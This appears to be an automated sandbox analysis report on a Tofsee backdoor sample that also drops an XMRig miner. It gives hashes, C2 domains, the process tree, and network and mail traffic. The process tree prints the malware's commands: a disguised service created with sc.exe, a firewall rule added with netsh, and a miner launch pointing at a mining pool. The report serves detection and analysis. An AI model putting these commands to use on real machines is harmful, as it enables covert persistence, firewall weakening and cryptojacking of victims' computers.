Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    10/02/2023, 14:00 UTC

General

  • Target

    file.exe

  • Size

    357KB

  • MD5

    417696104a850fb6d641959c9e084e0f

  • SHA1

    99f739f830c5555b8e00c8d40dca115f14d5d780

  • SHA256

    9dbd56890ad94f339c4b41633cb919614717aa56ef6fd109823f5b8fc8cb64cc

  • SHA512

    c7eaf00e1104a3d9d74dc6f3658b7af309979db64858ff339db511039b965e420056c21fb315bfe4b4e2bb98432d4ccb9f1b565871b33cab2f130cdc368186a2

  • SSDEEP

    3072:/9N5bk+xtGNaL/ROaFjXrEThTVDsSKnxkv4lZC9nf6NT2UU:l5LgaLkaFjkhJYSKxm4lOnfWT

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:900
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ydfgsdws\
      2⤵
        PID:1520
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nyuzqjvk.exe" C:\Windows\SysWOW64\ydfgsdws\
        2⤵
          PID:1240
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ydfgsdws binPath= "C:\Windows\SysWOW64\ydfgsdws\nyuzqjvk.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1300
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description ydfgsdws "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:272
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start ydfgsdws
          2⤵
          • Launches sc.exe
          PID:1644
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1856
      • C:\Windows\SysWOW64\ydfgsdws\nyuzqjvk.exe
        C:\Windows\SysWOW64\ydfgsdws\nyuzqjvk.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:804
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:316
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1520

      Network

      • flag-us
        DNS
        microsoft.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        microsoft.com
        IN A
        Response
        microsoft.com
        IN A
        20.112.52.29
        microsoft.com
        IN A
        20.81.111.85
        microsoft.com
        IN A
        20.84.181.62
        microsoft.com
        IN A
        20.103.85.33
        microsoft.com
        IN A
        20.53.203.50
      • flag-us
        DNS
        microsoft.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        microsoft.com
        IN MX
        Response
        microsoft.com
        IN MX
        microsoft-com.mail.protection.outlook.com
      • flag-us
        DNS
        microsoft-com.mail.protection.outlook.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        microsoft-com.mail.protection.outlook.com
        IN A
        Response
        microsoft-com.mail.protection.outlook.com
        IN A
        104.47.54.36
        microsoft-com.mail.protection.outlook.com
        IN A
        40.93.207.5
        microsoft-com.mail.protection.outlook.com
        IN A
        52.101.40.29
        microsoft-com.mail.protection.outlook.com
        IN A
        40.93.207.1
        microsoft-com.mail.protection.outlook.com
        IN A
        40.93.212.0
        microsoft-com.mail.protection.outlook.com
        IN A
        104.47.53.36
      • flag-us
        DNS
        svartalfheim.top
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        svartalfheim.top
        IN A
        Response
        svartalfheim.top
        IN A
        46.173.218.115
      • flag-us
        DNS
        yahoo.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        yahoo.com
        IN MX
        Response
        yahoo.com
        IN MX
        mta7.am0.yahoodns.net
        yahoo.com
        IN MX
        mta6�.
        yahoo.com
        IN MX
        mta5�.
      • flag-us
        DNS
        mta7.am0.yahoodns.net
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        mta7.am0.yahoodns.net
        IN A
        Response
        mta7.am0.yahoodns.net
        IN A
        67.195.204.74
        mta7.am0.yahoodns.net
        IN A
        67.195.228.110
        mta7.am0.yahoodns.net
        IN A
        67.195.228.106
        mta7.am0.yahoodns.net
        IN A
        67.195.204.77
        mta7.am0.yahoodns.net
        IN A
        67.195.204.72
        mta7.am0.yahoodns.net
        IN A
        98.136.96.76
        mta7.am0.yahoodns.net
        IN A
        67.195.204.73
        mta7.am0.yahoodns.net
        IN A
        98.136.96.74
      • flag-us
        DNS
        13.71.61.154.dnsbl.sorbs.net
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        13.71.61.154.dnsbl.sorbs.net
        IN A
        Response
      • flag-us
        DNS
        13.71.61.154.bl.spamcop.net
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        13.71.61.154.bl.spamcop.net
        IN A
        Response
      • flag-us
        DNS
        13.71.61.154.zen.spamhaus.org
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        13.71.61.154.zen.spamhaus.org
        IN A
        Response
      • flag-us
        DNS
        13.71.61.154.sbl-xbl.spamhaus.org
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        13.71.61.154.sbl-xbl.spamhaus.org
        IN A
        Response
      • flag-us
        DNS
        13.71.61.154.cbl.abuseat.org
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        13.71.61.154.cbl.abuseat.org
        IN A
        Response
      • flag-nl
        GET
        http://www.google.com/
        svchost.exe
        Remote address:
        142.251.39.100:80
        Request
        GET / HTTP/1.1
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
        Accept-Language: en
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
        Host: www.google.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 10 Feb 2023 14:02:34 GMT
        Expires: -1
        Cache-Control: private, max-age=0
        Content-Type: text/html; charset=UTF-8
        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
        Content-Encoding: gzip
        Server: gws
        Content-Length: 1920
        X-XSS-Protection: 0
        X-Frame-Options: SAMEORIGIN
        Set-Cookie: 1P_JAR=2023-02-10-14; expires=Sun, 12-Mar-2023 14:02:34 GMT; path=/; domain=.google.com; Secure
        Set-Cookie: AEC=ARSKqsIvFI4xd5iDkZiB6nGPVQ-dTc5EYehNybeK6-1bijajPZKiQfDJ; expires=Wed, 09-Aug-2023 14:02:34 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
        Set-Cookie: NID=511=TuKlgfbn4aLHESybbq6vUylZ00QKvJswg2JmLMgOWJx7bKwgBfVlqwXeBF4713rF1S6PTKhT0cd2jW1G-MV-pbgbUDGElvJKT5-VS38gssG_WFT8VrdjLMh7dAds2CFb2EZNhgKg9NaFXq_oiBQZ4bdPHbO0SHdCrbYSH8KxJUU; expires=Sat, 12-Aug-2023 14:02:34 GMT; path=/; domain=.google.com; HttpOnly
      • flag-nl
        GET
        http://www.google.com/
        svchost.exe
        Remote address:
        142.251.39.100:80
        Request
        GET / HTTP/1.1
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
        Accept-Language: en
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
        Host: www.google.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 10 Feb 2023 14:02:34 GMT
        Expires: -1
        Cache-Control: private, max-age=0
        Content-Type: text/html; charset=UTF-8
        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
        Content-Encoding: gzip
        Server: gws
        Content-Length: 1919
        X-XSS-Protection: 0
        X-Frame-Options: SAMEORIGIN
        Set-Cookie: 1P_JAR=2023-02-10-14; expires=Sun, 12-Mar-2023 14:02:34 GMT; path=/; domain=.google.com; Secure
        Set-Cookie: AEC=ARSKqsLktur28Ie6AqVY2k6MJ8Ww_c1LLMCGTpebVX8rVjng2WNeIlCb_w; expires=Wed, 09-Aug-2023 14:02:34 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
        Set-Cookie: NID=511=cdRlBpdgZE91_lRLCMXFXXoVuLJeYLBb_IjXubG0AUITcvfay74frKsDDqALcLLogHJRFBqSJJ00-T6xqANCIKnNmtw71OBpQyhNkmziqU8owYjplsAueDzeJE1JksQnYV4__EP7mrPd6-NQhzLI3D-XSI5-VlklL20l0-mzNeo; expires=Sat, 12-Aug-2023 14:02:34 GMT; path=/; domain=.google.com; HttpOnly
      • flag-us
        DNS
        www.instagram.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        www.instagram.com
        IN A
        Response
        www.instagram.com
        IN CNAME
        geo-p42.instagram.com
        geo-p42.instagram.com
        IN CNAME
        z-p42-instagram.c10r.instagram.com
        z-p42-instagram.c10r.instagram.com
        IN A
        157.240.247.174
      • flag-us
        DNS
        google.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        google.com
        IN MX
        Response
        google.com
        IN MX
        smtp.google.com
      • flag-us
        DNS
        smtp.google.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        smtp.google.com
        IN A
        Response
        smtp.google.com
        IN A
        142.250.27.27
        smtp.google.com
        IN A
        142.250.27.26
      • flag-us
        DNS
        fastpool.xyz
        -a
        Remote address:
        8.8.8.8:53
        Request
        fastpool.xyz
        IN A
        Response
        fastpool.xyz
        IN A
        213.91.128.133
      • flag-us
        DNS
        mail.ru
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        mail.ru
        IN MX
        Response
        mail.ru
        IN MX
        mxs.mail.ru
      • flag-us
        DNS
        mxs.mail.ru
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        mxs.mail.ru
        IN A
        Response
        mxs.mail.ru
        IN A
        94.100.180.31
        mxs.mail.ru
        IN A
        217.69.139.150
      • flag-us
        DNS
        i.instagram.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        i.instagram.com
        IN A
        Response
        i.instagram.com
        IN CNAME
        instagram.c10r.instagram.com
        instagram.c10r.instagram.com
        IN A
        157.240.247.63
      • flag-us
        DNS
        13.71.61.154.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        13.71.61.154.in-addr.arpa
        IN PTR
        Response
      • 20.112.52.29:80
        microsoft.com
        svchost.exe
        190 B
        92 B
        4
        2
      • 104.47.54.36:25
        microsoft-com.mail.protection.outlook.com
        svchost.exe
        152 B
        3
      • 46.173.218.115:443
        svartalfheim.top
        https
        svchost.exe
        355 B
        582 B
        5
        6
      • 80.66.75.254:485
        svchost.exe
        10.4kB
        569.9kB
        218
        422
      • 67.195.204.74:25
        mta7.am0.yahoodns.net
        svchost.exe
        152 B
        3
      • 176.113.115.239:429
        svchost.exe
        388 B
        1.4kB
        7
        7
      • 176.113.115.154:429
        svchost.exe
        33.0kB
        3.8kB
        40
        42
      • 176.113.115.155:429
        svchost.exe
        388 B
        1.4kB
        7
        7
      • 80.66.75.4:429
        svchost.exe
        388 B
        1.4kB
        7
        7
      • 176.113.115.135:429
        svchost.exe
        271 B
        437 B
        5
        5
      • 176.113.115.136:429
        svchost.exe
        35.9kB
        4.1kB
        42
        41
      • 142.251.39.100:80
        www.google.com
        svchost.exe
        152 B
        3
      • 142.251.39.100:80
        http://www.google.com/
        http
        svchost.exe
        643 B
        3.0kB
        6
        6

        HTTP Request

        GET http://www.google.com/

        HTTP Response

        200
      • 142.251.39.100:80
        www.google.com
        svchost.exe
        152 B
        3
      • 142.251.39.100:80
        http://www.google.com/
        http
        svchost.exe
        643 B
        3.0kB
        6
        6

        HTTP Request

        GET http://www.google.com/

        HTTP Response

        200
      • 142.251.39.100:80
        www.google.com
        svchost.exe
        152 B
        3
      • 157.240.247.174:443
        www.instagram.com
        tls
        svchost.exe
        2.4kB
        30.3kB
        23
        34
      • 142.250.27.27:25
        smtp.google.com
        svchost.exe
        152 B
        3
      • 213.91.128.133:10060
        fastpool.xyz
        -a
        842 B
        2.0kB
        7
        8
      • 94.100.180.31:25
        mxs.mail.ru
        svchost.exe
        152 B
        3
      • 157.240.247.63:443
        i.instagram.com
        tls
        svchost.exe
        1.5kB
        27.2kB
        17
        27
      • 80.66.75.254:485
        svchost.exe

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\nyuzqjvk.exe

        Filesize

        13.6MB

        MD5

        552ad1c9d370049c4b74c244a2d4e0f6

        SHA1

        c5a452cb86e719192ede43c50b8ad45e63da977a

        SHA256

        51257b1632bc98d496884ce32f73b7922e06fa5a7c757d7ee29db57892a0ff5b

        SHA512

        fdae23380544439f7e7e545345420db9cab86ee4b888bc4ece4b8bedd2e3cfc7a57b8db6d3dbb41739d838b833528bc6b5b9d9d9edacad52cba6507ef71204cf

      • C:\Windows\SysWOW64\ydfgsdws\nyuzqjvk.exe

        Filesize

        13.6MB

        MD5

        552ad1c9d370049c4b74c244a2d4e0f6

        SHA1

        c5a452cb86e719192ede43c50b8ad45e63da977a

        SHA256

        51257b1632bc98d496884ce32f73b7922e06fa5a7c757d7ee29db57892a0ff5b

        SHA512

        fdae23380544439f7e7e545345420db9cab86ee4b888bc4ece4b8bedd2e3cfc7a57b8db6d3dbb41739d838b833528bc6b5b9d9d9edacad52cba6507ef71204cf
